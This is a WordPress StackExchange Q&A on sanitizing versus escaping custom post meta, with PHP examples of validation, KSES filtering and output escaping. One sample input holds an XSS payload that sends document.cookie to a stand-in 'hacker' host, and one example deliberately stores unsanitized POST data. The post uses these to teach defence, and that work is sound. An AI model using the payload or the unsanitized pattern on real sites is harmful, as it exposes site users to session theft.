Should I sanitize custom post meta if it is going to be escaped later?

https://wordpress.stackexchange.com/questions/384049

22-04-2021
|

Question

Firstly, sorry if this has been properly answered before. After reading a lot of questions and guides, I'm still not totally convinced on the best way of doing things.

I understand the basics of XSS- and SQL-injection vulnerabilities. I understand the difference between data validation, sanitization and escaping.

When talking about Wordpress and sanitizing and escaping, most often I see people recommending using the Wordpress default functions to store the user input into database, and escaping it only as late as possible.

Yet in many cases people recommend sanitizing the input before saving it to the db:

https://stackoverflow.com/questions/59692734/sanitize-wordpress-metabox-fields-post-array-the-right-way

https://developer.wordpress.org/themes/theme-security/data-sanitization-escaping/

This is a little bit confusing, as wordpress sanitization functions also encode some html characters. To my experience, this easily leads to double encoding (especially if you can't use wordpress-functions like esc_html and esc_attr which do not double encode). Of course having potentially malicious code in DB is not nice either.

When developing a Wordpress plugin, should I generally sanitize user input data (for example textarea with sanitize_textarea_field) before using update_post_meta function, if I know I'm going to escape the data later on? Or should I store user input as is and only escape as late as possible? What is the best practice?

La solution

Short Answer: If you have properly validated the data, then sanitization can be made optional.

Longer Answer

User-supplied data and data from unknown/external sources should always be treated as untrusted even in the case where the user was actually yourself, so yes, we should always validate and/or sanitize such data. And therefore, no, please do not store user input as-is without validating or sanitizing the data.

Excerpt from "Securing (sanitizing) Input" in the plugin developer handbook:

You use sanitizing when you don’t know what to expect or you don’t want to be strict with data validation.

Any time you’re accepting potentially unsafe data, it is important to validate or sanitize it.

Remember: Even admins are users, and users will enter incorrect data on purpose or on accident. It’s your job to protect them from themselves.

And here are some examples which might help:

// let's assume $_POST['my_number_field'] is set
// same goes to $_POST['my_text_field']

// bad - no validation and no sanitization
update_post_meta( 123, 'int_meta', $_POST['my_number_field'] );

// no validation, but the value is sanitized
$value = filter_input( INPUT_POST, 'my_number_field', FILTER_SANITIZE_NUMBER_INT );
update_post_meta( 123, 'int_meta', $value );

// example with validation
if ( is_numeric( $_POST['my_number_field'] ) ) {
    update_post_meta( 123, 'int_meta', (int) $_POST['my_number_field'] );
} else {
    // show an error, delete the meta or whatever is necessary
}

// example with validation - here we specify a range of values
if ( in_array( $_POST['my_text_field'], array( 'one', 'two', '3' ) ) ) {
    update_post_meta( 123, 'text_meta', $_POST['my_text_field'] );
} else {
    // show an error, delete the meta or whatever is necessary
}

This is a little bit confusing, as wordpress sanitization functions also encode some html characters. To my experience, this easily leads to double encoding (especially if you can't use wordpress-functions like esc_html and esc_attr which do not double encode).

Maybe I'm not fully understanding that, but it seemed that you're probably just not using the correct functions?

For example, if you're trying to sanitize a data in which HTML tags are allowed, then you would want to use the WordPress KSES functions like wp_filter_kses() (to allow basic HTML tags) and wp_filter_post_kses() (to allow all the many HTML tags allowed in post content like p):

$value = '<p>some dynamic input data with <b>html</b>, <q>a quote</q> & potentially ' . // wrapped
    'unsafe code..</p> "><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>';

// This allows only basic HTML tags like strong and blockquote.
update_post_meta( 123, 'foo_meta', wp_filter_kses( $value ) );

// This allows advanced HTML tags (p, div, etc.) and attributes.
update_post_meta( 123, 'foo_meta', wp_filter_post_kses( $value ) );

Then when rendering the data, you would use escaping functions like esc_textarea(), esc_attr() and wp_kses_post():

<!-- In a form field, use esc_attr() or esc_textarea() for textarea fields -->
<input value="<?php echo esc_attr( get_post_meta( 123, 'foo_meta', true ) ); ?>">
<textarea rows="3"><?php echo esc_textarea( get_post_meta( 123, 'foo_meta', true ) ); ?></textarea>

<h2>Foo meta</h2>
<!-- Use wp_kses_post() when **not** displaying in form fields -->
<?php echo wp_kses_post( get_post_meta( 123, 'foo_meta', true ) ); ?>

Or perhaps you misunderstood the difference between sanitizing and escaping?

Because basically, sanitizing means cleaning/filtering the input, whereas escaping means we secure the output so that for example HTML tags are not parsed unless if we were allowing HTML tags in the input. (but even if HTML is allowed, you should limit the allowed tags)

And I've actually given an example above where I sanitized the meta value (that came from a variable named $value which is the input) and then I escaped the meta value when displaying it on the page. So in the latter case, the meta value (which was retrieved from the database) became an output when I echoed the value.

Should I sanitize custom post meta if it is going to be escaped later?

Further Reading